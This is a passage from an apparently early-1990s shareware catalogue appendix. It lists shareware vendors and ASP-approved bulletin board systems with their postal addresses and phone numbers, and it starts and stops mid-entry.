UNIT 41, MARKHAM ONTARIO L3R + 9Z4 CANADA + Phone: 416-470-7669 + + Husco Austria Handelsgesellshcaft m.b.H. + Address: Bosendorferstrasse 4, VIENNA 1010 Wien AUSTRIA + Phone: 431/505 43 11 + + Hyper.doc Business Information Systems + Address: 9119 SKINNER ROAD, FREDONIA NY 14063 + Phone: 716-672-4254 + + HYTech Inc. + Address: PO BOX 805, DEARBORN MI 48121 + Phone: 313-837-1796 + + Image Maker Software + Address: 8426 E. OLD LINCOLN WAY, HOBART IN 46342 + Phone: 219-947-4131 + + Infinity Data Products + Address: 1404 OLD CAPE RD #3, JACKSON MO 63755 + Phone: 314-243-8483 + + InfoQuest + Address: ROUTE 1, BOX 157, CARBONDALE IL 62901-9702 + Phone: 618-549-3414 + + Appendix B, "Vendor addresses" 444 + + + + Intelligent Resources Corp + Address: 3386 STATE ROAD 584, SUITE 301, PALM HARBOR FL 34684 + Phone: 813-785-0614 + + International Market, MCCA + Address: PO BOX 41, MADISONVILLE TX 77864-041 + Phone: 409-348-6963 + + IZAK Computer Marketing Co + Address: PO BOX 5476, HILO HI 96720 + Phone: 808-935-1273 + + Jamtec + Address: UNIT 21, 27 RICKARD ROAD BANKSTOWN, SYDNEY NSW 2200 + AUSTRALIA + Phone: 61 2 7072924 + + Jim Thompson Enterprises + Address: 150 S Magnolia Avenue Ste #248, Anaheim CA 92804 + Phone: 714-821-5090 + + JY SOFTWARE + Address: PO BOX 6736, ELIZABETH NJ 07206 + Phone: 908-820-0565 + + Kamloops Computer Software + Address: 357 ROBSON DRIVE, KAMLOOPS BC V2E 1W2 CANADA + Phone: 374-3475 + + Kencordall Computers + Address: 5111 NEW STREET, BURLINGTON ONTARIO L7L 1V2 CANADA + Phone: 416-333-0444 + + Khan's Software + Address: 36 JUDITH CRES, BRAMPTON ONT L6S 3J4 CANADA + Phone: 416-458-7360 + + Knightec + Address: 35 ROBB BLVD. #6, ORANGEVILLE ONT L9W 3L1 CANADA + Phone: 519-942-0624 + + Logiciels Pcs + Address: C.P. 33, CAP MADELEINE PQ G8T 7W1 CANADA + Phone: 819-373-4408 + + Logicom + Address: 5180 LE HAURE, TROIS-RIVIERES-QUEST QUEBEC G8Y 5Y9 + CANADA + Phone: 819-378-5013 + + Low Price Software + Address: 6307 BRIAR TERRACE, HOUSTON TX 77072 + Phone: 713-933-5409 + + Appendix B, "Vendor addresses" 445 + + + + Manaccom Pty Ltd + Address: 9 CAMFORD STREET, MILTON 4064 QLD AUSTRALIA + Phone: 617-368-2366 + + Maple Informatica Ltda. + Address: 8 CAINES AVE, WILLOWDALE ONT M2M 1G2 CANADA + Phone: 55-11-826-4849 + + Marc Routhier Co + Address: 3431, DE LA DAUVERSIERE, SAINTE-FOY QUE G1X 2H6 CANADA + Phone: 418-653-3705 + + Masled Informatica + Address: Via Dei Pioppi,9-04011 APRILIA (LT), APRILIA LATINA + 04011 ITALY + Phone: 06-9271733 + + MAXIMUM Share + Address: 13337 E SOUTH ST, CERRITOS CA 90701 + Phone: 310-402-1909 + + MediaLand, Inc. + Address: 151 SLATER STREET, SUITE 100, OTTAWA ONT K1P 5H3 + CANADA + Phone: 613-736-6954 + + Meg-A-Byte PC Software Supply + Address: 8110 W. COLFAX AVE, LAKEWOOD CO 80215 + Phone: 303-239-9224 + + MegaByte(Shareware) U.K. + Address: 90 CAMERON WAY, KNIGHTSRIDGE, LIVINGSTON WEST LOTHIAN + EH54 8HF SCOTLAND UK + Phone: 0506 441384 + + Micro Star + Address: 1945 CAMINO VIDA ROBLE, CARLSBAD CA 92008 + Phone: 619-931-4949 + + Micro Technology + Address: 21 VINTAGE DRIVE, E WINDSOR NJ 08520 + Phone: 609-426-0465 + + Microforum Mfg Inc + Address: 1 WOODBOROUGH AVE, TORONTO ONT M6M 5A1 CANADA + Phone: 416-656-6406 + + MicroPower Software + Address: 6928 W ELMHURST AVE, LITTLETON CO 80162 + Phone: 303-973-5141 + + Midwest Software Library + Address: PO BOX 6184, GRAND FORKS ND 58206-6184 + Phone: 800-333-7614 + + Appendix B, "Vendor addresses" 446 + + + + Mike Rowe Services + Address: 204-2722 FIFTH STREET, VICTORIA BC V8T 4B2 Canada + Phone: 604-381-2553 + + Mile High Software + Address: 5149 WEST 69TH PL., WESTMINSTER CO 80030-5700 + Phone: 303-426-0465 + + Mitchell Disk Software Library + Address: PO Box 5096, Bradford MA 01835-0096 + Phone: 508-372-1779 + + Mom and Pop's Software + Address: 4205 MARINER BLVD, SUITE 169, SPRING HILL FL 34609 + Phone: 904-688-9108 + + Moran Communications + Address: PO BOX 608, LUCEDALE MS 39452-0608 + Phone: 601-947-7024 + + Moresoft Data + Address: FROVAGEN 14, VAXJO 352 41 SWEDEN + Phone: 0470-112 85 + + Most Significant Bits + Address: 13733-B MADISON AVE, LAKEWOOD OH 44107 + Phone: 216-221-9836 + + Mr Disk Software + Address: 5915 CASEY DRIVE, KNOXVILLE TN 37909 + Phone: 615-584-3952 + + MT Software + Address: GREENSWARE HOUSE, THE BROADWAY, TOTLAND ISLE OF WIGHT + P039 0BX ENGLAND + Phone: 0983-756056 + + Multitecnica Computarizadas, S.A. de C.V + Address: Dr. Lucio 103 Edif. B-123 Desp. 1, Mexico 06720 Mexico + Phone: 011-52-5588-0083 + + N4ZDU Shareware + Address: RT 3 Box 1151, OLDTOWN FL 32680 + Phone: 904-542-9348 + + National Software + Address: 2062 MERCHANTS GATE, PO BOX 76023, OAKVILLE ONT L6M + 2Z8 CANADA + Phone: 416-847-3484 + + NB-data + Address: DANMARKSGADE 16, DK-4874 GEDSER DENMARK + Phone: 53 87 99 75 + + Appendix B, "Vendor addresses" 447 + + + + NBG Computer & PD Service + Address: Von Auer Str. 19, GEISLING W-8401 GERMANY + Phone: 09481 1481 + + Next Stop Computing + Address: PO Box 1467, San Carlos CA 94070 + Phone: 415-592-6735 + + Night Owls Computer Service + Address: 219 POTOMAC AVE, BUFFALO NY 14213 + Phone: 716-886-2726 + + Noad Software + Address: 915 BLVD AVE, PO BOX 701, AVIS PA 17721 + Phone: 717-753-3792 + + North London Shareware + Address: 188 OSIDGE LANE, SOUTHGATE LONDON N14 5DR ENGLAND + Phone: 044-081-361-9811 + + NovaWare, Inc. + Address: 7477 STANFORD, ST LOUIS MO 63130 + Phone: 314-862-5123 + + Novel Solutions + Address: 921 NORTHWOOD, WILLIAMSVILLE NY 14221 + Phone: 716-632-2365 + + Nuclear Computing + Address: 7667 SHADYGRADE AVENUE, NORTH HOLLYWOOD CA 91605 + Phone: 818-764-5374 + + Omicron Systems Ltd. + Address: 45, BLENHEIM CRESCENT, LEIGH-ON-SEA ESSEX SS9 3DT + ENGLAND + Phone: 0702-710391 + + Ordinateurs Utilisateurs France (OUF) + Address: 27 Rue des Bluets, PARIS 75011 FRANCE + Phone: 33-1 4338-0258 + + P.D. (& SHAREWARE) SOFTWARE LIBRARY + Address: WINSCOMBE HOUSE, BEACON RD, CROWBOROUGH SUSSEX TN6 + 1UL ENGLAND + Phone: 0892-663298 + + Passware Systems Ltd + Address: 175 GEORGIAN WAY, SHERWOOD PARK ALBERTA T8A 2W7 CANADA + Phone: 403-464-5660 + + PC Arcade + Address: 14 MORELAND AVE, OAKVILLE CT 06779 + Phone: 203-798-3318 + + Appendix B, "Vendor addresses" 448 + + + + PC Assist Ltd. + Address: 4/4 CARUBBERS CLOSE, 135 HIGH ST, EDINBURGH EH1 1SJ + SCOTLAND + Phone: 031-557-6432 + + PC Independent User Group + Address: 87 HIGH STREET, TONBRIDGE KENT TN9 1RX ENGLAND + Phone: 0732-771512 + + PC Productivity, Inc. + Address: 5777 RIVERSIDE DR, CAPE CORAL FL 33904 + Phone: 813-542-6711 X402 + + PC Shareware + Address: 1763 GARNET AVE, SAN DIEGO CA 92109 + Phone: 619-272-6673 + + PC Shareware Limited + Address: CRANLEIGH HOUSE, KEMBERTON, SHIFNAL TF11 9LY ENGLAND + Phone: 952-585348 + + PC Software & Supply + Address: RT 1, BOX 219H, SOUTH SIOUX CITY NE 68776 + Phone: 402-494-7133 + + PC Software Depot + Address: 965 E. 830 S, PLEASANT GROVE UT 84062 + Phone: 801-785-9507 + + PC Software Publishing + Address: 372-K LORONG 1, HILIR GARDEN, UJONG PASIR MELAKA 75050 + MALAYSIA + Phone: 06-244598 + + PC-SIG + Address: 1030D East Duane Ave, Sunnyvale CA 94086 + Phone: 408-730-9291 + + PCDisk + Address: PO BOX 10627, KILLEEN TX 76547-0627 + Phone: 817-526-2383 + + PD Select, Inc. + Address: PO BOX 1884, GASTONIA NC 28053 + Phone: 704-868-2664 + + PD Software House + Address: 6456 TUPELO DRIVE, SUITE 363, CITRUS HEIGHTS CA 95621 + Phone: 800-359-1985 + + PD Software Services P/L + Address: 8 BENTLEY ST, WANTIRNA 3152 AUSTRALIA + Phone: 03-729-9534 + + Appendix B, "Vendor addresses" 449 + + + + Pd Softwarehouse + Address: PO BOX 362, PENNANT HILLS NSW 2120 AUSTRALIA + Phone: 02 484-8483 + + PD-Service Lage + Address: Friedrich str.29, D-4937 Lage/Lippe WEST GERMANY + Phone: 49-5232-66912 + + PeakSoft + Address: 3 GOLF CENTER, SUITE 231, HOFFMAN ESTATES IL 60195 + Phone: 708-843-1225 + + Pearl Agency + Address: W-7845 Am Kalischacht 4, Bugginger W-7845 GERMANY + Phone: 011-49-7631-4042/4043 + + Pendragon Software Library + Address: 75 MEADOWBROOK ROAD, EAST GREENWICH RI 02818 + Phone: 401-884-6825 + + Peninsula Books, Inc + Address: 3612 NW 97TH BLVD, GAINESVILLE FL 32606 + Phone: 904-332-1009 + + People's Choice + Address: 235 GERMANTOWN BEND CV. # 1, CORDOVA TN 38018-7238 + Phone: 901-753-0148 + + Peoples Software Co. + Address: 85 SOUTH WASHINGTON ST, SEATTLE WA 98104 + Phone: 206-622-6469 + + Performance Shareware, Inc. + Address: 627 TOPSAIL ROAD, ST JOHNS NEWFOUNDLAND A1E 2E1 CANADA + Phone: 709-368-5022 + + Personal Computer Creations Inc. + Address: PO BOX 2201, PEACHTREE CITY GA 30269 + Phone: 404-304-1304 + + Pik A Program + Address: 13 ST. MARKS PLACE, NEW YORK NY 10003 + Phone: 212-598-4459 + + Power PC, Inc. + Address: 2650 LA CIENEGA AVE, LOS ANGELES CA 90034 + Phone: 310-836-0338 + + Power User + Address: 3021 HOLLAND ST, ERIE PA 16504 + Phone: 814-454-0234 + + Appendix B, "Vendor addresses" 450 + + + + Prairieware + Address: 3101 1ST AVENUE N/PO BOX 265, GREAT FALLS MT 59401 + Phone: 406-727-4675 + + Printers Shareware + Address: 5019-5021 West Lovers Lane, Dallas TX 75209 + Phone: 214-350-1902 + + Pro-Line Software + Address: PO BOX 2416, CLIFTON NJ 07015 + Phone: 201-772-1993 + + Public (software) Library + Address: PO BOX 35705, HOUSTON TX 77235-5705 + Phone: 713-721-5205 + + Public Brand Software + Address: 3750 Kentucky Avenue, Indianapolis IN 46241 + Phone: 317-856-1485 + + Public Domain Users Group + Address: 1263 GROVE PARK DRIVE, ORANGE PARK FL 32073 + Phone: 904-264-3512 + + Rainbow Avenue Software + Address: 380 CAMINO DE ESTRELLA, SAN CLEMENTE CA 92672 + Phone: 714-366-3783 + + Rainbow Software + Address: PO Box 3908, Ontario CA 91761 + + Reasonable Solutions, Inc + Address: 2101 WEST MAIN STREET, MEDFORD OR 97501 + Phone: 503-776-5777 + + Redstone Mountain Software Inc. + Address: 758 PONDEROSA DRIVE, EVERGREEN CO 80439 + Phone: 303-674-0176 + + Remington Business Systems, Inc. + Address: 14928 DOGWOOD, ORLAND PARK IL 60462 + Phone: 708-403-8010 + + Romy Informa Tech + Address: 301 E. SECOND ST, FARMVILLE VA 23901 + Phone: 804-392-8784 + + S+W. Scheffel + Address: Schillerstr. 95, Berlin - 12 D-1000 GERMANY + Phone: 49 30 312 4455 + + SAS Software + Address: PO BOX 375 STATION "B", HOWARD BEACH NY 11414 + Phone: 718-848-0301 + + Appendix B, "Vendor addresses" 451 + + + + SaturnSoft, Ltd + Address: 701 FRANKLIN SQ. BOX 328, MICHIGAN CITY IN 46360 + Phone: 219-874-6398 + + Select a Ware + Address: 418 N. UNION, MADISON SD 57042-2044 + Phone: 605-256-9600 + + Seltec Shareware Library + Address: 101/29 NEWLAND ST, BONDI JUNCTION NSW 2022 AUSTRALIA + Phone: (2)369-2292 + + Shareable Software International, Inc. + Address: PO BOX 59102, SCHAUMBURG IL 60159 + + Sharesoft + Address: AZCUENAGA 1061-4to. Piso Depto. 18, BUENOS AIRES + CAPITAL FEDERAL C.P. 1115 ARGENTINA + + Shareware & More + Address: 60 BROADWAY, SHELBY OH 44875 + Phone: 419-347-4065 + + Shareware America Marketing Co. + Address: RR2 BOX 57, IUKA IL 62849 + Phone: 618-323-6279 + + Shareware Depot + Address: 12261 SW 132 CT, MIAMI FL 33186 + Phone: 305-378-9282 + + Shareware Express + Address: 1662 SISKIYOU BOULEVARD, ASHLAND OR 97520 + Phone: 503-482-5136 + + Shareware International + nd + Address: 109 Massachusetts Avenue, 2 Floor, Route 2A, + LUNENBURG MA 01462 + Phone: 508-343-3011 + + Shareware Outlet Inc. + Address: 713 110TH AVE NE, SUITE 206, BELLEVUE WA 98004 + Phone: 206-646-3571 + + Shareware Systems + Address: 72 CASCADE DRIVE, #36 BUILDING 2 LEVEL 2, ROCHESTER NY + 14614 + Phone: 716-663-4229 + + Shareware Testing Laboratories + Address: PO BOX 11499, INDIANAPOLIS IN 46201-0499 + Phone: 317-352-0021x5550 + + Appendix B, "Vendor addresses" 452 + + + + Shareware To Go + Address: PO BOX 574575, ORLANDO FL 32857-4575 + Phone: 407-679-5159 + + Shareware Today + Address: PO BOX 291, 106 LYNN COVE, BROOKLAND AR 72417 + Phone: 501-932-9035 + + Shareware Unlimited + Address: 3908 WILMINGTON COURT, VIRGINIA BEACH VA 23456 + Phone: 804-471-0882 + + Shareware-Elite + Address: 25 CADES PARK, HELSTON CORNWALL TR13 8QS ENGLAND + Phone: 0326-564164 + + Sherburne Knowledge Systems, Inc. + Address: 12220 RIVERWOOD DRIVE, BURNSVILLE MN 55337 + Phone: 612-895-6099 + + Sim-Com Services + Address: 35158 High Drive, Abbotsford BC V2S 4P6 Canada + Phone: 604-854-DISK + + Simple Series + Address: PO BOX 1167, PLAISTOW NH 03865 + Phone: 603-893-8553 + + Simply Software + Address: 2989 SARLETTO STREET, NORTH PORT FL 34287 + Phone: 813-426-2568 + + Sizzleware Shareware Library + Address: PO Box 6429, Lake Charles LA 70606 + Phone: 318-474-1548 + + SMM Softwarevertrieb & Beratung + Address: Hermann-Lons-Str. 12, 6501 BUDENHEIM GERMANY + Phone: 01149 6139 5813 + + Sofsource/Digital By Design + Address: PO BOX 1092, EAST LANSING MI 48826 + Phone: 517-349-3564 + + Soft Consult GmbH + Address: MARKTPLATZ 2, 6277 BAD CAMBERG GERMANY + Phone: 0049-6434-3399 + + Softcell Services + Address: 25 MAYWOOD, BRYNA PONTYCLUM MID GLAMORGAN CF7 9PZ + ENGLAND + + Appendix B, "Vendor addresses" 453 + + + + Softshoppe + Address: PO BOX 3678, ANN ARBOR MI 48106-3678 + Phone: 313-763-8721 + + Softville Computer Supplies + Address: UNIT 5 STRATFIELD PK, ELETTRA AVE, WATERLOOVILLE + HAMPSHIRE P07 7XN ENGLAND + Phone: 0705-266509 + + Software Connection + Address: 816 S. HIGHLAND AVE., BALTIMORE MD 21224 + Phone: 301-276-8302 + + Software Excitement! + Address: 6475 CRATER LAKE HWY, Central Point OR 97502 + Phone: 503-826-8086 + + Software Express + Address: 1090 ROCK ROAD COURT SUITE 12, EAST DUNDEE IL 60118 + Phone: 708-426-0077 + + Software Select + Address: 204 GLADSTONE, BLUE SPRINGS MO 64014 + Phone: 816-228-4595 + + Software Shoppe Ltd + Address: PO Box 6328, CHELSEA MA 02150 + Phone: 508-772-7909 + + Software Source, Inc. + Address: 165 CRISTICH LANE UNIT C, CAMPBELL CA 95008 + Phone: 800-443-3475 + + Software Stop + Address: 5211 GRAND BLVD, WINDSOR ONT N8T 1M2 CANADA + Phone: 519-974-6731 + + Solomon Seven Software + Address: 9300 8TH STREET, DAWSON CREEK BC V1G 3N6 CANADA + Phone: 604-782-4205 + + Southern Data + Address: PO BOX 8926, PEMBROKE PINES FL 33084 + Phone: 305-963-0587 + + Spartan Software Marketing + Address: 4418 PARRIS BRIDGE RD, SPARTANBURG SC 29303 + Phone: 803-574-0437 + + Spearwood Shareware Service + Address: 22 Sitwell Close, Spearwood WEST AUSTRALIA 6163 + AUSTRALIA + Phone: 011 61 94185721 + + Appendix B, "Vendor addresses" 454 + + + + Sunshine Shareware + Address: 1630 SOUTH DIAMOND SUITE B, SANTA ANA CA 92704 + Phone: 714-754-4577 + + Sunshine Software + Address: 6492 SOUTH ST. #470, LAKEWOOD CA 90713 + Phone: 310-866-9801 + + Svenska PC Klubben + Address: PO BOX 30069, GOTHENBURG S-40043 SWEDEN + Phone: 46-31-475101 + + T & D Electronics + Address: RT 1 BOX 65, BIG ROCK TN 37023 + Phone: 615-232-7934 + + T.E.C. Systems + Address: PO BOX 96058, AUCKLAND 1004 NEW ZEALAND + Phone: 9-603-491 + + that Disk company + Address: PO BOX 634, GLEN ELLYN IL 60138-0634 + Phone: 708-858-8357 + + The $5 Computer Software Store + Address: 951 CALLE NEGIOCIO, SAN CLEMENTE CA 92672 + Phone: 714-366-8777 + + The Computer Store + Address: PO BOX 923, LONGVIEW WA 98632 + Phone: 206-425-2682 + + The Datapak Library + Address: 1226 S PLAZA, SPRINGFIELD MO 65804 + Phone: 417-881-4483 + + The Generic Software Place + Address: 5491 W. 88TH AVE. STE 113-B, WESTMINSTER CO 80033-3002 + Phone: 303-427-3621 + + The Hi-Tech Marketplace + Address: 3 VERNON STREET, PARLIN NJ 08859 + Phone: 908-525-2581 + + The PC Exchange + Address: 2550 STAG RUN BLVD. #438, CLEARWATER FL 34625 + Phone: 813-799-6971 + + The Shareware Club, Inc. + Address: 217 FIRST AVE SE, PO BOX 1750, DUVALL WA 98019-1750 + Phone: 206-788-7424 + + Appendix B, "Vendor addresses" 455 + + + + The Software Centre + Address: Little Brympton,d'evercy, Yeovil.,Som. BA22 8TD U.K. + Phone: 44 935 862609 + + The Software Labs + Address: 3767 OVERLAND AVE. #112, LOS ANGELES CA 90034 + Phone: 213-559-5456 + + The Software Peddler + Address: 9941 PINES BLVD, PEMBROKE PINES FL 33024 + Phone: 305-436-6732 + + Toff-Soft PD & Shareware Service + Address: Gartenstr. 20, D-4500 Osnabruck D-W-4500 GERMANY + Phone: 0541-597369 + + Tonehalt (Holland) Ltd + Address: POSTBUS 13500,, 2501 EM DEN HAAG HOLLAND + Phone: 011-31-70-3658372 + + TRAX + Address: STEENSTRAAT 61, ZEDELGEM BELGIUM 8211 EUROPE + Phone: 32-50-20-07-35 + + Treasure Chest Software + Address: 5010 PECAN DR, SHELBY NC 28150 + Phone: 704-487-8447 + + Trilogy International + Address: 20826 BEACONSFIELD, ST CLAIR SHORES MI 48080 + Phone: 313-885-5065 + + Turbo User Group + Address: PO BOX 1510, POULSBO WA 98370 + Phone: 206-779-9508 + + Turner Information Systems + Address: 795 HAMMOND DR. #1104, ATLANTA GA 30328 + Phone: 404-851-0107 + + Two Guys Systems & Software + Address: 1684 DECOTO ROAD SUITE 202, UNION CITY CA 94587 + Phone: 510-796-5452 + + Ultimate Data Technology + Address: 7751 HICKORY LANE, FINDLAY OH 45840 + Phone: 419-423-3920 + + Unipub Technologies + Address: 4/F, Flat A, Hoi On Building, 92-98 Sai Wan Ho Street, + Shaukiwan, HONG KONG HONG KONG + Phone: 852-571-5196 + + Appendix B, "Vendor addresses" 456 + + + + ValueWare + Address: 400 MIDSHIPMAN ROAD, KNOXVILLE TN 37922 + Phone: 615-675-7958 + + Vasstec Ltd + Address: 1485 DUMBARTON ROAD, GLASGOW G14 9XL SCOTLAND + Phone: 011-41-954-6853 + + Venus Electronics Shareware + Address: 26 PEVENSEY WAY FRIMLEY GREEN, CAMBERLEY SURREY GU16 + 5YJ ENGLAND + Phone: 0252 837860 + + Vision Shareware + Address: 24 FLINDERS AVE, COLONEL LIGHT GDNS SOUTH AUSTRALIA + 5041 AUSTRALIA + Phone: 61 8 277 0069 + + Vista Photographic L&P, Inc. + Address: 95-106 HUAALA PL, MILILANI HI 96789 + Phone: 808-625-7512 + + Whitecat Software + Address: 1958 37TH AVE., VERO BEACH FL 32960 + Phone: 407-569-6634 + + Wilkes & Son + Address: BUNBURY, TARPORLEY, CHESHIRE CW6 9PE UK + Phone: 0829 260775 + + Winners Edge Computer Software + Address: 3531 W 5000 S, ROY UT 84067 + Phone: 801-825-4229 + + Words and Worms + Address: 19748 COLLINS RD, SANTA CLARITA CA 91351 + Phone: 805-252-8209 + + Z-Products + Address: PO BOX 34339, BALTIMORE MD 21221-1739 + Phone: 410-686-5908 + + Ziff Communications + Address: 25 FIRST STREET, CAMBRIDGE MA 02142 + Phone: 617-252-5255 + + Zillesoft GmbH + Address: Neuot Wall 2-4, D-4130 Moets 1 West Germany + Phone: 02841-28049 + + Appendix C, "Bulletin Boards" 457 + + + + + + Appendix C + Bulletin Boards + + This appendix lists each ASP-approved computer bulletin board + system (BBS). These BBSs have agreed to abide by ethical stan- + dards when offering shareware. + + Set your communications software to "8 data bits, no parity, 1 + stop bit" before calling any of these BBSs. + + + "YA! WEBECAD!" + Address: 556 E PARKLAND AVE, EVANSVILLE IN 47711 + BBS Phone: 812-428-3870 + + **CCAT** + Address: 11326 DEW CREEK CIRCLE, CORPUS CHRISTI TX 78410 + BBS Phone: 512-242-2206 + th + 24 Street Exchange + Address: PO BOX 188263, SACRAMENTO CA 95818-8263 + BBS Phone: 916-454-2992 + + << + Address: 2601 S PROVIDENCE, LOT #40, COLUMBIA MO 65203 + BBS Phone: 314-443-0319 + + Positive I.D. + Address: 1803 KNOX ROAD, ARDMORE OK 73401 + BBS Phone: 405-226-2223 + + PRIME CUT BBS + Address: 13 KIRKBRAE DRIVE, LINCOLN RI 02865-1007 + BBS Phone: 401-334-3096 + + Public Access/Shwr Unltd 900 + Address: 2511 STEWART AVE, LAS VEGAS NV 89101 + BBS Phone: 702-383-9939 + + PUMA Wildcat! + Address: PO BOX 13231, ALEXANDRIA LA 71315 + BBS Phone: 318-443-1065 + + Appendix C, "Bulletin Boards" 466 + + + + R Fringe Forum + Address: PO BOX 520624, LONGWOOD FL 32752 + BBS Phone: 407-331-RATT + + R.B. Enterprises + Address: 711 EAST 134TH STREET, BRADENTON FL 34202 + BBS Phone: 813-748-5380 + + Random Access Information Netw + Address: PO BOX 136, CORBETT OR 97019 + BBS Phone: 503-695-3250 + + RAPID RIVER BBS + Address: 6848 HIGHWAY 34, RUDOLPH WI 54475-9531 + BBS Phone: 715-435-3855 + + Rocky Mountain Software + Address: PO BOX 18279, SALT LAKE CITY UT 84118 + BBS Phone: 801-963-8721 + + ROSEDALE DATA LINE + Address: PO BOX 9561, ROSEDALE MD 21237 + BBS Phone: 410-866-1755 + + Rural Free Delivery + Address: RD1 BOX 872, MIFFLINTOWN PA 17059 + BBS Phone: 717-436-2349 + + Sales Automation Success! + Address: 2815 NW PINE CONE DRIVE, ISSAQUAH WA 98027-8698 + BBS Phone: 206-392-8943 + + SATALINK INFOR SYSTEMS BBS + Address: PO BOX 449, HUNTINGDON VALLEY PA 19006-0449 + BBS Phone: 215-364-3324 + + SLATCH 1 + Address: 57 AV. DE LA REPUBLIQUE, BONDY F-93160 FRANCE + BBS Phone: 33 148020821 + + SLATCH 2 BBS + Address: 57 AV. DE LA REPUBLIQUE, BONDY F-93160 FRANCE + BBS Phone: 33 148020821 + + Smart Office Solutions (SOS) + Address: 84 SOUTH DIVISION ST, NEW ROCHELLE NY 10805-2706 + BBS Phone: 914-576-6139 + + SOFTWARE CREATIONS + Address: 26 HARRIS STREET, CLINTON MA 01510 + BBS Phone: 508-365-2359 + + Appendix C, "Bulletin Boards" 467 + + + + Software Expressions BBS + Address: 12006 MANORGATE, HOUSTON TX 77031 + BBS Phone: 713-541-3910 + + Southern On-line Services + Address: 5116 HIGHLAND ROAD APT 75, BATON ROUGE LA 70808 + BBS Phone: 501-968-8431 + + Southern Star BBS + Address: 3500 HOUMA BLVD., APT 113, METAIRIC LA 70006 + BBS Phone: 504-885-5928 + + SSC BBS + Address: 8FL-3 NO.70,SEC.2 ROOAENERT RD, TAIPRI TAIWAN + BBS Phone: 886-2 366-0101 + + ST COM-LINK INFORMATION SERVIC + Address: RT 1 BOX 806-C, MENA AR 71953 + BBS Phone: 501-394-1454 + + Stingray, Stingray II + Address: 95 N PIERCE, CLOVIS CA 93612 + BBS Phone: 209-298-9461 + + STUDIO PC BBS + Address: 10411 PAULA COURT, PORT RICHEY FL 34668 + BBS Phone: 813-862-8850 + + Surfside Connection + Address: BOX 1112 79 FINLAY RD, EAST ORLEANS MA 02643 + BBS Phone: 508-225-9520 + + T-8000 Information System + Address: 3324 49TH STREET SW, CALGARY AB T3E 3Y3 CANADA + BBS Phone: 403-246-4487 + + Tech Pro BBS + Address: PO BOX 2707, DEL MAR CA 92014 + BBS Phone: 619-755-7357 + + Technical Information&Freeware + Address: 636 CORAL REEF DRIVE, GAITHERSBURG MD 20878 + BBS Phone: 301-926-4367 USA + + The "FILE-CACHE" BBS + Address: 9831 W WILDWOOD TERRACE, WEST ALLIS WI 53227 + BBS Phone: 414-545-8545 + + The Albuquerque ROS + Address: PO BOX 13150, ALBUQUERQUE NM 87192-3150 + BBS Phone: 505-299-5974 + + Appendix C, "Bulletin Boards" 468 + + + + THE B.I.B.S. SYSTEM + Address: PO 1441, CHARLESTON SC 29402 + BBS Phone: 205-271-5385 + + The Bad Attitude BBS! + Address: PO BOX 89, ERIE PA 16512 + BBS Phone: 814-456-6209 + + The Big Byte + Address: 609 ROGERS ST., ROCKWELL NC 28138 + BBS Phone: 704-279-2295 + + THE BLUE RIDGE EXPRESS + Address: PO BOX 34446, RICHMOND VA 23234 + BBS Phone: 804-790-1675 + + THE BOARD + Address: 2828 COCHRAN ST #271, SIMI VALLEY CA 93065 + BBS Phone: 818-366-8874 + + The Break RBBS + Address: 4660 WHITAKER PL, DALE CITY VA 22193-3011 + BBS Phone: 703-680-9269 + + The Byzantine Empire BBS + Address: 1109 MANSON ST, WAUSAU WI 54401 + BBS Phone: 715-848-2833 + + The CAD BBS + Address: 29312 APPLEWOOD COURT, SAN JUAN CAPISTRANO CA 92675 + BBS Phone: 714-364-1633 + + The Cheshire Cat + Address: PO BOX 3701, ZEPHYR COVE NV 89449 + BBS Phone: 916-542-3088 + + The Circuit Board + Address: 1112 BALMORA DRIVE, LAFAYETTE CO 80026 + BBS Phone: 303-666-0302 + + The Collectors' BBS + Address: PO BOX 861, CHATHAM NJ 07928 + BBS Phone: 201-635-4519 + + The Comm-Post + Address: 540 ACOMA STREET, DENVER CO 80204 + BBS Phone: 303-534-4646 + + The Computer Station BBS + Address: 1960 KAPIOLANI STE 113-388, HONOLULU HI 96826 + BBS Phone: 808-247-7328 + + Appendix C, "Bulletin Boards" 469 + + + + THE CONSULTANT BBS + Address: JAF PO BOX 8571, NEW YORK NY 10116 + BBS Phone: 718-837-3236 + + The ELUSIVE DIAMOND + Address: 9922 COFFER WOODS RD, BURKE VA 22015 + BBS Phone: 703-323-6423 + + The Evans BBS + Address: 302 EAST COFFREN AVE, GREENVILLE MI 48838 + BBS Phone: 616-754-6180 + + The FABulous BBS + Address: 4310 S SEMORAN BLVD SUITE 564, ORLANDO FL 32822 + BBS Phone: 407-277-3449 + + the FLASH POINT bbs + Address: 1665 E JEFFERSON AVE, POMONA CA 92651 + BBS Phone: 714-625-4920 + + The G-Net BBS + Address: 4125 STRATFORD RD, BOARDMAN OH 44512 + BBS Phone: 216-782-6135 + + The Garbage Dump + Address: PO BOX 16032, ALBUQUERQUE NM 87191-6032 + BBS Phone: 505-294-5675 + + The Gooey (GUI) BBS + Address: 217 EAST 85TH ST SUITE 135, NEW YORK NY 10028 + BBS Phone: 212-876-5885 + + The Grapevine BBS + Address: 5324 CAMP ROBINSON RD, NORTH LITTLE ROCK AR 72118 + BBS Phone: 501-753-8121 + + THE ICEBOX BBS + Address: 144-29 75 AVE, FLUSHING NY 11367 + BBS Phone: 718-793-8548 + + THE INVENTION FACTORY + Address: 321 GREENWICH STREET, NEW YORK NY 10013-3340 + BBS Phone: 212-431-1194 + + THE KANDY SHACK + Address: 12531 STRATHMORE DRIVE, GARDEN GROVE CA 92640 + BBS Phone: 714-636-2667 + + The Lebanon Link + Address: PO BOX 608, LEBANON TN 37087 + BBS Phone: 615-399-0707 + + Appendix C, "Bulletin Boards" 470 + + + + The Library! BBS + Address: PO BOX 70177, RIVERSIDE CA 92504 + BBS Phone: 714-780-6365 + + The Locker Room + Address: 2125 GREENBRIER ST, SANTA ANA CA 92706 + BBS Phone: 714-542-5917 + + The Mail Room + Address: 903 COLLEGE DR. APT 1, ANDERSON IN 46012-4040 + BBS Phone: 317-644-5029 + + The Miami PC Users Group + Address: 10448 SW 49TH PLACE, COOPER CITY FL 33328 + BBS Phone: 305-680-9481 + + THE MODEMS DELIGHT BBS + Address: 14503 SABINE DR, LA MIRADA CA 90638 + BBS Phone: 213-944-1221 + + THE MOTHER BOARD BBS + Address: 318 E. 8TH, NEWTON KS 67114 + BBS Phone: 316-284-2421 + + The Mother Board II + Address: 1102 ENTERPRISE DRIVE STE 209, GRAND PRAIRIE TX 75051 + BBS Phone: 214-642-1287 + + The Nor'Easter Premimum BBS + Address: 67 BAYBERRY LANE, LONDONDERRY NH 03053-4606 + BBS Phone: 603-432-6711 + + THE OPENWINDOW BBS + Address: 30 BROADWAY, BEVERLY MA 